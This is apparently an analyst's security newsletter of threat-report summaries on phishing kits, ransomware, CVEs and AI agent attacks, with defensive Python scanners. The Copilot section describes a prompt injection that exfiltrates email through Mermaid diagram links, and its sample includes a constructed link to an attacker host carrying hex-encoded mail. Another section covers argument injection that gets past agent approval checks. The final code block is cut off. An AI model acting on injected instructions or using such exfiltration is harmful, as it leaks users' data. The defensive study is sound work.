This is a newsletter I create and share with my internal security team. Feel free to grab and do the same.
Impact Solutions: The Point-and-Click Toolkit Democratizing Malware Delivery
A newly observed phishing toolkit—Impact Solutions—provides a user-friendly, point-and-click interface that lets low-skill threat actors generate weaponized attachments (e.g., .lnk shortcuts, HTML smuggling files, malicious SVGs) and staged payloads. The kit emphasizes social-engineering effectiveness (icon spoofing, decoy documents, Cloudflare-style verification prompts) and includes UAC bypasses, sandbox checks, and techniques intended to evade SmartScreen and many antivirus solutions.
Key Insights
Low skill, high impact: The toolkit produces ready-to-send malicious artifacts (shortcut builders, HTML smuggling templates, SVG payloads) that remove the need for malware development expertise.
Social-engineering first: Files are crafted to look legitimate (PDF icons, real-looking invoices, faux verification pages) and often present decoy documents while executing payloads in the background.
Evasion features: Built-in UAC bypass attempts, anti-VM/sandbox checks, AppData execution, and claims to bypass SmartScreen and common AV detection.
ClickFix-style and staged attacks: Some templates instruct users to paste Win+R commands or open local file paths, enabling ClickFix-style execution flows and multi-stage downloads.
Defender opportunity: Behavioral and contextual email analysis (rather than signature matching) is more effective at detecting these campaigns, since the artifacts intentionally evade static detection.
Further Reading: Abnormal AI – Impact Solutions: The Point-and-Click Toolkit Democratizing Malware Delivery
Massive Surge in Scans Targeting Palo Alto Networks Login Portals
BleepingComputer has observed a significant spike in reconnaissance activity against Palo Alto Networks devices. Thousands of hosts globally are probing PAN-OS management or login endpoints (ports 443, 7239, 7777) in just a short timeframe. This wave of scanning appears preliminary—likely mapping vulnerable or misconfigured devices for potential follow-on attacks, such as exploitation, credential stuffing, or proxy pivoting.
Key Insights
Scans primarily target authentication portals for PAN-OS and administrative web UIs (e.g. ports 443, 7239, 7777).
Most scanning traffic originates from distributed IP pools, indicating broad reconnaissance campaigns rather than focused attacks.
Such scanning often precedes attacks like SSRF, zero-day exploits, credential brokering, or lateral pivots through exposed devices.
Organizations should monitor unusual traffic to management endpoints and verify that PAN device interfaces are properly firewalled and accessible only to trusted networks.
Further Reading: Bleeping Computer – Massive Surge in Scans Targeting Palo Alto Networks Login Portals
ShinyHunters (UNC6040) Launches Corporate Extortion Blitz
The ShinyHunters group, operating under aliases like Scattered LAPSUS$ Hunters and associated with threat cluster UNC6040, has initiated a broad extortion campaign threatening dozens of Fortune 500 companies. The group claims to have stolen sensitive Salesforce data through voice-phishing, along with terabytes of consulting/project files from Red Hat and token access data from Salesloft. They are demanding ransom under threat of public data release.
Key Insights
Theft method: voice phishing was used to trick organizations into granting access to Salesforce; stolen data includes authentication tokens and customer records.
Victim profile: major companies such as Toyota, FedEx, Disney/Hulu, UPS, Red Hat, and others are alleged victims.
Extortion tactics: the group has published a “victim shaming” blog demanding ransom and threatening to leak data otherwise; it claims to have compromised large volumes of configuration data, consulting files, and infrastructure secrets.
Malware and targeting: They use malicious message attachments disguised as screensavers (.scr/.news-style), distributed via phishing; payloads include backdoors (e.g. ASYNCRAT) with capabilities like file exfiltration, keylogging, screenshot capture, etc.
Legal and law-enforcement response: Some members are already indicted or convicted; companies such as Salesforce publicly refuse to negotiate with ransom demands, emphasizing forensic analysis and regulatory contact.
Further Reading: Krebs on Security – ShinyHunters Wage Broad Corporate Extortion Spree
ClickFix Generator: New Automated Toolkit Enables Mass Social Engineering Attacks
Unit 42 has discovered a first-of-its-kind ClickFix Generator toolkit that enables threat actors to automate the creation of ClickFix-style phishing campaigns at scale. The generator crafts prompt texts, social engineering flows, and malicious payloads, allowing adversaries to produce campaign modules in a matter of minutes instead of hours. Early usage traces suggest the tool is already active in the wild, deployed in multiple targeted phishing campaigns.
Key Insights
Quick campaign assembly: With ClickFix Generator, attackers can build full campaigns (lures, messaging flow, payload delivery) rapidly.
Template-based operations: The toolkit comes with prebuilt templates for lures (e.g., “Update Required,” “Verification Needed”) and payload strategies.
Operational reuse: Once built, modules can be re-used or tweaked across multiple campaigns to reduce development overhead.
Detection challenges: Automated tooling increases the volume and diversity of campaigns, making static signatures less effective; defenders must rely more on flow behavior analytics and anomaly detection.
Further Reading: Unit 42 – ClickFix Generator: First-of-Its-Kind Automated Toolkit Observed in the Wild
Employees Sharing Company Secrets with ChatGPT: Rising AI Data-Leak Risk
New research shows a worrying trend: about 77% of enterprise employees regularly paste sensitive corporate data into generative AI tools like ChatGPT. Even more concerning, around 82% of those interactions come from unmanaged personal accounts, putting oversight, compliance, and data protection at risk. The study also flagged that 40% of files uploaded to these tools contain sensitive info like payment data, and 22% of pasted content includes regulated or proprietary information.
Key Insights
Using personal accounts to access AI tools creates blind spots for corporate IT and security teams.
Routine copying and pasting of internal data into AI tools bypasses traditional data loss prevention tools.
Sensitive data exposure isn’t limited to large uploads—small text snippets can still cause regulatory or competitive harm.
Employee training and strict AI usage policies are essential to protect company data.
Further Reading: Cyber Security News – “Employees Share Company Secrets on ChatGPT”
Upcoming Changes to Internet Explorer Mode in Microsoft Edge
Microsoft is updating how Internet Explorer Mode (IE Mode) works in Edge, with implications for compatibility, policy enforcement, and legacy application support. These changes impact how organizations manage legacy web apps relying on the IE11 engine via Edge’s integrated mode.
Key Insights
IE Mode enables legacy IE11 rendering (Trident/MSHTML engine) within Edge for compatibility with older intranet sites and applications.
Only sites explicitly configured (via Enterprise Mode Site List or Group Policy) will load in IE Mode; others default to modern rendering.
Upcoming updates may restrict or alter certain IE Mode behaviors—affecting ActiveX, legacy scripting, user agent emulation, or navigation fallback logic.
Organizations should audit and catalog legacy Web apps now to ensure a smooth transition before changes take effect.
Further Reading: Microsoft – Changes to Internet Explorer Mode in Microsoft Edge
100,000+ IP Botnet Launches Coordinated RDP Attack Wave
GreyNoise observed a coordinated botnet operation (started Oct 8, 2025) involving over 100,000 unique IPs from 100+ countries targeting U.S. Remote Desktop Protocol (RDP) infrastructure using RD Web Access timing attacks and RDP web-client login enumeration.
Key Insights
Mass scale & coordination: The activity involves over 100,000 IPs that share a similar TCP fingerprint, indicating centralized control.
Primary vectors: Operators leveraged RD Web Access timing attacks and RDP Web Client login enumeration to probe and enumerate targets.
Geographic distribution: Source IPs originated from 100+ countries, but attacks were concentrated on U.S. RDP infrastructure.
High-confidence botnet assessment: GreyNoise attributes this as a single multi-country botnet campaign rather than unrelated scanners.
Further Reading: GreyNoise – 100,000+ IP Botnet Launches Coordinated RDP Attack Wave
7-Zip Vulnerabilities: Code Execution, MoTW Bypass & RAR5 Crashes
Several significant vulnerabilities in 7-Zip (versions prior to 24.07 / 24.09 / 25.00 depending on the issue) have been discovered and/or exploited. These flaws allow attackers to bypass Windows’ “Mark-of-the-Web” protections, execute arbitrary code via crafted archives, or crash systems using malicious RAR5 files.
Key Insights
A critical vulnerability (CVE-2025-0411) lets nested archives bypass MoTW protections, enabling malware delivery without triggering usual warnings.
Another high-severity bug in the Zstandard decompression module enables remote code execution in affected versions before 24.07.
RAR5 decoder vulnerability (CVE-2025-53816) allows denial-of-service conditions via malicious RAR5 archives in versions before 25.00.
Version 25.00 (and 25.01 for some symbolic link flaws) includes fixes; users must update manually since 7-Zip lacks automatic update features.
Further Reading: CyberNews – 7-Zip Vulnerabilities
Espionage Exposed: North Korean Remote Worker Network
KELA’s investigation has uncovered thousands of North Korean operatives using fabricated identities and AI-assisted tools to land remote jobs in design, engineering, IT, and architecture. Their employment is a dual-purpose strategy: generate revenue for the regime and gain access to sensitive data, proprietary designs, or system access from within organizations.
Key Insights
Operatives use AI-generated headshots, edited identification, and falsified backgrounds to pass hiring checks.
Target roles span technical and creative fields—beyond just software development.
Evidence links some accounts to infostealer logs and developer-level system access.
Detection patterns include reused passwords, temporary email domains, and unusually polished portfolios for new accounts.
Further Reading: KELA – Espionage Exposed: Inside a North Korean Remote Worker Network
Healthcare Ransomware Roundup: Q1–Q3 2025
According to Comparitech’s 2025 report, ransomware and data breaches in healthcare have continued their alarming trend. The first three quarters saw more than 350 publicly disclosed attacks, resulting in over 140 million records impacted and ransom demands totaling over $350 million. The report highlights the prevalence of vulnerabilities, misconfigurations, and operational dependencies that make healthcare systems a persistent target.
Key Insights
Healthcare organizations face especially high ransomware pressure, given the value and sensitivity of patient data.
Large-scale attacks disproportionately impact smaller entities, which lack mature cyber resilience strategies.
Ransom demand sizes continue to escalate—multiple cases exceeded $10 million.
Attack vectors remain consistent: phishing, unpatched systems, remote desktop exploits, and misconfigured cloud services.
Further Reading: Comparitech – Healthcare Ransomware Roundup Q1–Q3 2025
Tracking ClickFix Infrastructure (AITMFeed / Lab539)
Security analysts have begun mapping core infrastructure used to support ClickFix campaigns, consolidating domain, redirect, and payload delivery patterns. The reconstruction aids defenders in identifying malicious modules tied to active campaigns.
Key Insights
Infrastructure layering: Redirect chains often pass through multiple affiliate or proxy domains before landing on ClickFix lures.
Template reuse: Several ClickFix landing pages share structural and domain-naming patterns—indicating reuse by operators or shared kits.
Payload hosting nodes: Final payload domains are typically short-lived or dynamically rotated, complicating static blocklists.
Early indicators: Identified domains and redirect paths can serve as hunting indicators to uncover emerging ClickFix campaigns before payload execution.
Further Reading: AITMFeed – Tracking ClickFix Infrastructure
Record DDoS Botnet Targets U.S. ISPs (Krebs on Security)
The Aisuru botnet, powered by hundreds of thousands of infected IoT devices, launched a record-breaking DDoS attack peaking at nearly 30 Tbps—impacting major U.S. ISPs such as AT&T, Comcast, and Verizon. Most of the compromised devices were routers and cameras running outdated firmware or default credentials.
Key Insights
IoT exploitation: Aisuru spreads by scanning for unsecured consumer devices with weak or factory passwords.
Massive impact: Outbound attack traffic from U.S. networks degraded ISP and customer performance.
Mirai lineage: Built from the leaked Mirai code, Aisuru now dominates global IoT botnet activity.
Shared responsibility: ISPs and users must ensure devices are updated and secured to prevent botnet recruitment.
Further Reading: Krebs on Security – DDoS Botnet Aisuru Blankets US ISPs in Record DDoS
Stealthy Phishing Kit Targets Microsoft 365 Users (Barracuda)
Barracuda researchers identified a new phishing kit, dubbed Whisper 2FA, designed to steal Microsoft 365 credentials and bypass multi-factor authentication. The kit operates in real time, capturing both login and MFA tokens through background scripts that validate credentials with attacker-controlled servers.
Key Insights
Real-time MFA capture: Uses live AJAX loops to exfiltrate credentials and prompt victims until valid MFA tokens are obtained.
Anti-analysis techniques: Employs multiple layers of encoding, disables developer tools, and crashes browser inspection to avoid detection.
Rapid adoption: Nearly one million attack attempts observed in a month, placing Whisper 2FA among the top three phishing kits globally.
Kit evolution: Newer versions add stronger obfuscation and broader MFA method support, signaling active development and threat scalability.
Further Reading: Barracuda – Threat Spotlight: Stealthy Phishing Kit Targets Microsoft 365
PhantomVAI Loader Delivers Infostealers in Targeted Attacks
Researchers at Palo Alto Networks’ Unit 42 have identified a new malware loader named PhantomVAI, which is being used to deliver well-known information stealers such as LummaC2 and Rhadamanthys. The loader uses deceptive Microsoft OneDrive-themed lures and employs advanced evasion tactics to bypass traditional security tools.
Key Insights
PhantomVAI leverages phishing campaigns to distribute malicious payloads disguised as OneDrive documents.
The loader uses multilayered obfuscation and anti-analysis techniques to avoid detection.
Once executed, it deploys info-stealing malware that exfiltrates sensitive data, including credentials and browser information.
Its modular design allows threat actors to easily update and customize the loader for different payloads or delivery methods.
Further Reading: Unit42 – PhantomVAI Loader Delivers Infostealers
Non-Web Protocols: The Hidden Attack Surface (Zscaler ThreatLabz)
Zscaler’s ThreatLabz team reports that attackers are increasingly leveraging non-web protocols—such as DNS, RDP, and SMB—to evade detection and exploit enterprise environments. The findings show that a significant share of modern intrusions now occur outside traditional web traffic channels.
Key Insights
DNS abuse dominates: DNS-based tunneling, dynamic updates, and domain generation algorithms account for nearly 84% of non-web protocol attacks.
Brute-force activity surging: RDP represents over 90% of brute-force incidents, while SMB remains a key vector for lateral movement and ransomware propagation.
Retail and energy sectors hit hardest: Retail accounted for 62% of observed attacks, followed by energy and manufacturing industries where legacy systems persist.
Legacy protocols exploited: Long-trusted protocols like SMBv1 and RDP continue to be weaponized for access, persistence, and data exfiltration.
Further Reading: Zscaler – Under the Radar: How Non-Web Protocols Are Redefining the Attack Surface
Scattered LAPSUS$ Hunters Shift Tactics Toward EaaS & Insider Recruitment (Unit 42 / Palo Alto Networks)
Unit 42 reports that the cybercriminal group Scattered LAPSUS$ Hunters—known for major extortion operations—is evolving its approach. The group appears to be transitioning toward an Extortion-as-a-Service (EaaS) model while recruiting insiders and experimenting with new ransomware capabilities.
Key Insights
Extortion-as-a-Service model: The group is offering affiliates the ability to run extortion campaigns without relying on traditional ransomware encryption.
Insider recruitment drive: Members are openly seeking employees within telecom, gaming, SaaS, and hosting companies across several Western countries.
Data leak activity: Following a public deadline, the group released data allegedly tied to multiple aviation, energy, and retail organizations.
New ransomware development: References to a tool dubbed “SHINYSP1D3R” suggest potential expansion into full ransomware operations.
Broader targeting: Beyond major tech platforms, the group’s focus now spans hospitality, retail, and loyalty program data.
Further Reading: Unit 42 – Scattered LAPSUS$ Hunters Signal Shift in Tactics
Tykit: New Phishing Kit Stealing Hundreds of Microsoft Accounts in Finance (ANY.RUN)
Researchers at ANY.RUN have identified a new phishing kit framework, dubbed Tykit, that targets Microsoft 365 credentials across financial and corporate sectors. The kit demonstrates organized Phishing-as-a-Service (PhaaS) characteristics, allowing widespread deployment and efficient credential harvesting.
Key Insights
Broad targeting: Active since May 2025, Tykit campaigns have primarily targeted finance, construction, IT, and professional services organizations.
Layered delivery chain: Attacks begin with an SVG image embedding encoded JavaScript that redirects victims to fake Microsoft 365 login pages.
Credential exfiltration: After submission, stolen data is transmitted through encrypted POST requests to attacker-controlled command-and-control endpoints.
Evasion and MFA bypass: The kit detects analysis tools, restricts developer console access, and supports methods to bypass two-factor authentication.
Commercial reuse: Numerous samples share nearly identical domain patterns and code structures, indicating large-scale kit distribution.
Further Reading: ANY.RUN – Tykit Technical Analysis
Microsoft 365 Copilot — Arbitrary Data Exfiltration via Mermaid Diagrams (Adam Logue)
Adam Logue demonstrated an indirect prompt-injection technique against Microsoft 365 Copilot where a specially crafted Office document caused Copilot to fetch sensitive tenant data (e.g., recent emails), hex-encode it, and embed that encoded data into a generated Mermaid diagram. The diagram contained a clickable “login” artifact whose link pointed to an attacker server with the hex data in the URL; when activated, the data was exfiltrated. Microsoft has since patched the issue by removing interactive/dynamic hyperlink behavior from Mermaid diagrams in Copilot.
Key Insights
Indirect prompt injection + rendering chain: The attack chained prompt injection (hidden instructions in document sheets) with Copilot’s ability to call enterprise search tools and then render outputs into Mermaid.
Mermaid as an exfil channel: Mermaid diagrams support CSS/hyperlink features that can be abused to place large, encoded payloads (hex strings) into clickable artifacts.
Encoded-data transport: Exfiltration relied on Copilot hex-encoding fetched data and embedding it in a URL — simple to decode from server logs once received.
Click vs zero-click nuance: Adam’s PoC required a click to transmit the data, but related research (e.g., Cursor IDE) shows remote rendering can enable zero-click variants — increasing risk where renderers auto-fetch remote content.
Patch validated: Microsoft removed interactive/dynamic hyperlink behavior in Mermaid renders for Copilot, mitigating the specific vector; defenders should still treat diagram rendering and LLM tool integrations as risky.
Further Reading: Adam Logue – Microsoft 365 Copilot: Arbitrary Data Exfiltration Via Mermaid Diagrams
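As an added example (not code from Adam Logue's write-up or from Microsoft), a defender-side scanner over assistant output: it pulls hyperlink directives out of Mermaid blocks, flags links to hosts outside an allowlist, and decodes long hex runs in the URL to show what would have left the tenant. The sample response, the payload string and the domain names are constructed for this example.

```python
import re
from urllib.parse import urlsplit

FENCE = "`" * 3  # a Markdown code fence, built here so the sample stays inline

# Minimal parsing on purpose: a fenced mermaid block and the
# click <node> [href] "<url>" directive, which renders as a hyperlink.
MERMAID_BLOCK = re.compile(r"`{3}mermaid[^\n]*\n(.*?)`{3}", re.S)
CLICK_LINK = re.compile(r'^\s*click\s+\S+\s+(?:href\s+)?"([^"]+)"', re.M)
# A run of 32+ hex digits is far longer than any legitimate id in a link.
HEX_RUN = re.compile(r"(?<![0-9a-fA-F])[0-9a-fA-F]{32,}(?![0-9a-fA-F])")


def mermaid_links(markdown: str) -> list[str]:
    """Every clickable URL inside every mermaid block of an assistant reply."""
    urls = []
    for block in MERMAID_BLOCK.findall(markdown):
        urls.extend(CLICK_LINK.findall(block))
    return urls


def decode_hex_runs(url: str) -> list[str]:
    """Decode long hex runs in the path and query: this is exactly what the
    receiving server would read back out of its access log."""
    parts = urlsplit(url)
    haystack = parts.path + "?" + parts.query
    decoded = []
    for run in HEX_RUN.findall(haystack):
        if len(run) % 2:          # odd length cannot be a whole byte string
            run = run[:-1]
        decoded.append(bytes.fromhex(run).decode("utf-8", errors="replace"))
    return decoded


def audit_response(markdown: str, allowed_hosts: set[str]) -> list[dict]:
    """Flag diagram links that point outside the tenant or carry hex payloads."""
    findings = []
    for url in mermaid_links(markdown):
        host = (urlsplit(url).hostname or "").lower()
        payload = decode_hex_runs(url)
        external = host not in allowed_hosts
        if external or payload:
            findings.append({
                "url": url,
                "host": host,
                "external": external,
                "hex_payload": payload,
                "severity": "high" if (external and payload) else "medium",
            })
    return findings


# Constructed sample reply (not the original PoC): the "login" node carries a
# hex-encoded string in the query of its link.
LEAK = "From: cfo@corp.example Subject: Q3 payroll draft".encode().hex()
SAMPLE_RESPONSE = f"""Here is the requested diagram:
{FENCE}mermaid
flowchart TD
    A[Report] --> B[Login to view]
    click B "https://collector.attacker.example/l?d={LEAK}" "Login"
{FENCE}
"""

if __name__ == "__main__":
    for finding in audit_response(SAMPLE_RESPONSE, {"corp.example"}):
        print(finding["severity"], finding["host"], finding["hex_payload"])
```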
Beyond Credentials: Weaponizing OAuth Applications for Persistent Cloud Access (Proofpoint)
Proofpoint researchers show how attackers are increasingly abusing OAuth applications to gain resilient, long-lived access inside compromised cloud environments. After an initial account takeover, adversaries can create or authorize internal OAuth apps with broad API scopes — allowing data access and command-and-control that survives password resets and MFA unless the malicious app is explicitly revoked.
Key Insights
Persistence beyond credentials: Malicious OAuth apps retain authorized access even after victims change passwords or enable MFA, creating durable backdoors.
Automatable attack flow: Proofpoint developed a proof-of-concept and tooling that demonstrate how attackers can fully automate app creation, permission assignment, and authorization.
Internal app abuse: Attackers leverage the ability to register or authorize internal (second-party) applications with custom scopes to read mailboxes, files, and other sensitive cloud resources.
Long-lived tokens & stealth: Tokens and app permissions can remain valid for extended periods (months to years) and are often overlooked by standard account-centric detections.
Detection gaps: Traditional defenses focused on credentials (password resets, MFA) are insufficient; defenders need app-centric telemetry and regular permission audits.
Further Reading: Proofpoint – Beyond Credentials: Weaponizing OAuth Applications for Persistent Cloud Access
Prompt Injection to RCE in AI Agents (Trail of Bits)
Trail of Bits demonstrates that argument-injection flaws in agent platforms can bypass “human approval” protections and lead to remote code execution (RCE). By exploiting pre-approved system commands whose arguments aren’t properly sanitized or separated, researchers achieved RCE across multiple popular agent implementations and propose design changes—like sandboxing and strict argument handling—to reduce the risk.
Key Insights
Approved-command attack surface: Allowlisting commands (e.g., find, git, rg) while failing to validate or safely separate arguments creates a powerful injection vector.
Argument injection practicalities: Attackers can craft arguments that append or alter behavior of pre-approved commands (e.g., via special characters, facade patterns or malformed flags) to escalate to arbitrary execution.
Human-approval bypass: Workflows that auto-execute “safe” commands without robust argument checks let adversaries bypass intended human-in-the-loop controls.
Cross-platform prevalence: Trail of Bits reproduced the class of vulnerability across three different agent platforms, suggesting the issue is a common design antipattern.
Evasion & usability tradeoffs: Naïve blocking of arguments breaks legitimate functionality; secure designs require careful argument modeling or safer alternatives (e.g., dedicated APIs).
Mitigations recommended: Use sandboxed execution, strong argument separation/parsing, avoid facade patterns that accept raw argument strings, and log/monitor command invocations for anomalous parameters.
Further Reading: Trail of Bits – Prompt injection to RCE in AI agents
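One way to implement the recommended argument separation, as an added example rather than Trail of Bits' own tooling: a Python allowlist that models each command's flags and positionals, confines paths to the workspace, refuses raw command strings, and runs argv without a shell. The policy for rg, git and find is a hypothetical one for the example.

```python
import logging
import subprocess
from pathlib import Path

log = logging.getLogger("agent.exec")


class RejectedInvocation(ValueError):
    """Raised when an argv does not fit the model for its allowlisted command."""


# Per-command argument model (hypothetical policy). Flags map to the kind of
# value they take: None (no value), "int", or "text". "leading" models the
# first positionals (free text, or a set of permitted subcommands); every later
# positional must be a path inside the workspace. Anything outside the model is
# rejected, so an unexpected flag never reaches the binary.
POLICY = {
    "rg":   {"flags": {"-n": None, "-i": None, "-g": "text", "--max-count": "int"},
             "leading": ["text"]},                     # the search pattern
    "git":  {"flags": {"--oneline": None, "--stat": None, "-n": "int"},
             "leading": [{"status", "log", "diff"}]},  # read-only subcommands
    "find": {"flags": {"-name": "text", "-type": "text", "-maxdepth": "int"},
             "leading": []},
}


def _check_value(token: str, kind: str) -> str:
    # A flag value must never be a further flag in disguise; ints must be ints.
    if token.startswith("-"):
        raise RejectedInvocation(f"value looks like a flag: {token!r}")
    if kind == "int" and not token.isdigit():
        raise RejectedInvocation(f"expected an integer, got {token!r}")
    return token


def _check_path(token: str, workspace: str) -> str:
    root = Path(workspace).resolve()
    target = Path(root, token).resolve()   # an absolute token replaces root
    if not target.is_relative_to(root):
        raise RejectedInvocation(f"path escapes the workspace: {token!r}")
    return token


def validate_invocation(argv, workspace: str) -> list[str]:
    """Return a validated argv for an allowlisted command, or raise."""
    if isinstance(argv, str):
        # Refuse the facade pattern: a raw string would need a shell to split it.
        raise RejectedInvocation("pass argv as a list, not a command string")
    if not argv or argv[0] not in POLICY:
        raise RejectedInvocation(f"command not allowlisted: {argv[:1]}")
    spec, out, positionals = POLICY[argv[0]], [argv[0]], 0
    tokens, i = list(argv[1:]), 0
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-"):
            name, eq, inline = tok.partition("=")
            if name not in spec["flags"]:
                raise RejectedInvocation(f"flag not allowlisted: {tok!r}")
            kind = spec["flags"][name]
            if kind is None:
                if eq:
                    raise RejectedInvocation(f"{name} takes no value")
                out.append(name)
            else:
                if not eq:                  # value is the next token
                    i += 1
                    if i == len(tokens):
                        raise RejectedInvocation(f"{name} needs a value")
                    inline = tokens[i]
                out += [name, _check_value(inline, kind)]
        else:
            if positionals < len(spec["leading"]):
                rule = spec["leading"][positionals]
                if rule != "text" and tok not in rule:
                    raise RejectedInvocation(f"subcommand not allowlisted: {tok!r}")
            else:
                _check_path(tok, workspace)
            out.append(tok)
            positionals += 1
        i += 1
    if positionals < len(spec["leading"]):
        raise RejectedInvocation("missing required positional argument")
    return out


def approve(argv, workspace: str):
    """Non-raising form for callers that want a decision: (argv or None, reason)."""
    try:
        return validate_invocation(argv, workspace), "ok"
    except RejectedInvocation as exc:
        return None, str(exc)


def run_approved(argv, workspace: str, timeout: float = 30.0):
    """Validate, log, then execute with shell=False so nothing parses metacharacters."""
    safe = validate_invocation(argv, workspace)
    log.info("exec %r in %s", safe, workspace)
    return subprocess.run(safe, cwd=workspace, shell=False,
                          capture_output=True, text=True, timeout=timeout)
```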
Global Smishing Campaign Targets Mobile Users (Unit 42 / Palo Alto Networks)
A large-scale smishing (SMS phishing) campaign has been identified by Unit 42, targeting mobile users across multiple regions. Attackers are exploiting promotional hooks and limited oversight on mobile endpoints to deliver malicious links and credential-harvesting portals.
Key Insights
Many messages impersonate banks, logistics firms, or retail brands and include URLs leading to credential-stealing sites or malicious apps.
The campaign spans numerous countries and uses localized language and brand cues to increase trust and response rates.
Because mobile devices often lack the endpoint protections found on desktops, the campaign leverages the low visibility of mobile threats to evade detection.
Tactics include use of short-link services, dynamic domains, and rapid rotation of landing pages to defeat static blocklists.
Further Reading: Unit 42
Devman’s RaaS Launch: The Affiliate Who Aims to Become the Boss (Analyst1)
Research by Analyst1 reveals how a ransomware affiliate known as Devman evolved from working under major cybercrime groups to launching his own Ransomware-as-a-Service (RaaS) platform in late 2025. The report highlights his shift from affiliate to operator, his use of the leaked DragonForce code, infrastructure consolidation, and efforts to recruit new affiliates.
Key Insights
Affiliate turned service operator: Devman transitioned from a high-performing affiliate to creating his own RaaS offering.
Capital investment signals seriousness: He actively purchased initial access in Western countries and built a dedicated leak site with high ransom demands.
Leveraging leaked code & bugs: His ransomware variant reused DragonForce/Conti code, showing both operational maturity and technical flaws.
Recruitment & platform launch: The RaaS platform went live in late September 2025, featuring affiliate recruitment messaging and new infrastructure.
Branding and self-promotion: Devman’s public persona projects a “gangster-entrepreneur” image, reflecting how ransomware operators blend crime with marketing.
Further Reading: Analyst1
Insider Threats Loom While Ransom Payment Rates Plummet (Coveware)
Coveware’s latest report reveals that despite a sharp decline in ransom payments in Q3 2025, insider-caused incidents are growing in significance. Although organizations are less frequently paying ransoms, internal misuse, negligence, and compromised credentials by insiders are becoming key contributors to successful breaches.
Key Insights
Ransom payment decline: Payment rates have fallen substantially, suggesting organizations are shifting to alternative recovery approaches.
Insider risk rise: The proportion of incidents involving insiders—whether malicious, negligent, or compromised—has increased notably.
Less money, more tactics: While the ransom amounts may drop, attackers are still achieving impact through stolen credentials, insider access, or supply-chain leverage.
Mitigation gap: Many organizations focus on external threat vectors but lack rigorous controls for internal access monitoring, exit protocols, and third-party liaison.
Further Reading: Coveware – Insider Threats Loom While Ransom Payment Rates Plummet
Catching Credential Guard Off-Guard (SpecterOps)
SpecterOps researchers have detailed new techniques that undermine Windows Credential Guard, a key defensive feature meant to isolate and protect user credentials. The findings demonstrate how attackers with elevated privileges can bypass Credential Guard to extract sensitive authentication data, even in systems considered fully protected.
Key Insights
Bypass through privilege misuse: Attackers can exploit accounts with specific service permissions to sidestep Credential Guard’s memory isolation.
In-memory data extraction: New tools enable credential dumping directly from protected memory regions, exposing NTLM hashes and LSA secrets.
Detection blind spots: Many defenders rely on Credential Guard as a standalone safeguard; this research highlights the need for behavioral detection and anomaly monitoring.
Lateral movement risk: Compromised credentials obtained through these methods allow stealthier privilege escalation and movement within the network.
Further Reading: SpecterOps
LockBit Returns — and It Already Has Victims (Check Point Research)
The ransomware group LockBit, previously disrupted in early 2024, has re-emerged under a new variant known as LockBit 5.0 (ChuongDong). Check Point Research confirmed new attacks spanning Windows, Linux, and ESXi systems across multiple regions, signaling a full return of one of the most prolific Ransomware-as-a-Service (RaaS) operations.
Key Insights
Affiliate recruitment resumes: LockBit is again advertising in underground forums, rebuilding its affiliate ecosystem.
Expanded platform targeting: The updated variant includes support for Windows, Linux, and ESXi environments.
Enhanced capabilities: Faster encryption and new evasion methods improve operational efficiency for attackers.
Global victim impact: Confirmed incidents across multiple continents indicate the group’s infrastructure is fully operational again.
RaaS resilience: Despite past takedowns, the LockBit model demonstrates the durability of ransomware service ecosystems.
Further Reading: Check Point Research
The YouTube Ghost Network (Unmasked – Check Point Research)
Researchers at Check Point Research uncovered a large-scale malware-distribution operation on YouTube — dubbed the YouTube Ghost Network — which used compromised and fake channels to post over 3,000 videos offering game cheats and cracked software but in fact delivering infostealers such as Rhadamanthys and Lumma Stealer. Those videos amassed hundreds of thousands of views and were deliberately boosted with fake likes and comments to create trust. The researchers mapped multiple account roles (video uploads, community posts, interaction bots) and showed how malware actors abuse platform trust and engagement tools to run self-infection traps at scale.
Key Insights
Role-based account structure: The network divided labor across accounts: content uploaders, engagement bots, and link/post sharers — enabling resilience even when channels were banned.
High-engagement deception: Some videos had hundreds of thousands of views and positive comment streams, increasing perceived legitimacy.
Infostealer distribution via “free” software lure: The campaigns baited users with cracked software or game hacks, directing them to archives hiding infostealers.
Massive scale and rapid growth: Over 3,000 malicious videos were identified, with 2025 upload volume tripling from prior years.
Platform-trust exploitation: Attackers leveraged YouTube’s social features to amplify reach and bypass traditional detection systems.
Further Reading: Check Point Research
Microsoft WSUS Remote Code Execution (CVE-2025-59287) Actively Exploited (Unit 42 / Palo Alto Networks)
A critical vulnerability in the Windows Server Update Services (WSUS) role—tracked as CVE-2025-59287—allows unauthenticated remote code execution (RCE) on Windows servers where WSUS is enabled. Researchers observed active exploitation following Microsoft’s emergency patch, making this a high-priority threat for enterprises.
Key Insights
Unauthenticated system-level access: Attackers exploiting the vulnerability can execute arbitrary code as SYSTEM on affected WSUS servers.
Wide exposure: Thousands of publicly exposed WSUS instances were detected, broadening the potential attack surface.
Rapid post-patch exploitation: Exploitation began shortly after an out-of-band update, and the vulnerability was added to the U.S. known-exploited vulnerabilities catalog.
Reconnaissance & exfiltration patterns: Observed attack chains include WSUS service processes spawning shells that gather domain data and exfiltrate via webhooks.
Preventable risk exposure: WSUS should never be Internet-facing; failing to block default WSUS ports or disable unused roles significantly increases risk.
Further Reading: Unit 42
New Phishing Attack Uses Invisible Characters to Evade Filters (Cybersecurity News)
Security researchers have observed a campaign that embeds invisible Unicode characters (zero-width and similar) into email subjects and URLs to evade keyword-based filters and URL reputation checks. The technique breaks up recognisable words and link patterns so automated scanners miss them while email clients render the content normally for users — increasing click-through risk and lowering detection rates.
Key Insights
Invisible-character obfuscation: Attackers insert zero-width spaces, soft hyphens, and other invisible Unicode characters into subject lines and URLs to defeat pattern-matching and reputation checks.
MIME/encoding abuse: Malicious emails use MIME tricks and encoded attachments (SVGs, HTML) to hide payloads and redirect chains from straightforward inspection.
SafeLinks & gateway bypasses: The obfuscation can break or bypass URL-rewriting and safe-link protections, causing scanners to misclassify or truncate suspicious links.
User-facing normalcy: Message lists may display garbled or incomplete subjects while the opened email shows a readable, convincing lure — increasing the chance a recipient will engage.
Hunting signals: Look for unusually high counts of zero-width/unicode characters in subjects/URLs, mismatched subject rendering between list view and message view, and abnormal redirect chains from SVG/HTML attachments.
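As an added defender-side example (not from the article), a small Python scorer for the hunting signals listed above: it counts zero-width and other Unicode format characters in a subject and URL, strips them to recover the rendered text, and reports keywords that only match after stripping. The sample message, the keyword list and the threshold are constructed for this example.

```python
import unicodedata

# Invisible/format characters commonly abused in lures (constructed list for this
# example); anything else in the Unicode "Cf" (format) category is treated the same.
INVISIBLE = {
    "\u200b",  # zero width space
    "\u200c",  # zero width non-joiner
    "\u200d",  # zero width joiner
    "\u2060",  # word joiner
    "\ufeff",  # zero width no-break space
    "\u00ad",  # soft hyphen
}

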